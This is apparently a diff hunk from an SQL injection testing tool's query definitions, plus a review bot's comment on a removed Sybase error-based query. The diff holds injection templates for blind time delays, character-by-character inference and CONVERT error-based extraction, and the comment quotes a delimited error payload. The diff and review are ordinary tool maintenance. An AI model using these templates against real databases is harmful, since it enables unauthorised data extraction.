<dbms value="SQLite"> <dbms value="SQLite">
<!-- Not supported on SQLite 2 --> <!-- Not supported on SQLite 2 -->
@ -477,7 +473,6 @@
<timedelay query="WAITFOR DELAY '0:0:%d'"/> <timedelay query="WAITFOR DELAY '0:0:%d'"/>
<substring query="SUBSTRING((%s), %d, %d)"/> <substring query="SUBSTRING((%s), %d, %d)"/>
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/> <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
<error query="%s %s=CONVERT(INT,(%s+(%s)+%s))"/>
<inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/> <inference query="AND ASCII(SUBSTRING((%s), %d, 1)) > %d"/>
<banner query="SELECT @@VERSION"/> <banner query="SELECT @@VERSION"/>
<current_user query="SELECT SUSER_NAME()"/> <current_user query="SELECT SUSER_NAME()"/>
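Review bot: The Sybase `<error>` query dropped in the last hunk (the dbms block ending with `SELECT SUSER_NAME()`) has no visible replacement, unlike the MySQL, PostgreSQL, Microsoft SQL Server and Oracle `<error>` lines, which map to the new `<epayload>` entries in payloads.xml. The only CONVERT-based epayload in view, `<epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>`, sits under a test whose `<details>`/`<dbms>` list is outside this chunk; if that test is tagged Microsoft SQL Server only, Sybase silently loses error-based exploitation after this commit. Either confirm that test's `<dbms>` covers Sybase or add a Sybase error-based test carrying the same epayload. Note also that the removed queries carried a `%s %s=` comparison prefix that the bare epayload expressions no longer include, so the caller is presumably expected to add the comparison itself — that caller is not in this chunk, so verify it does.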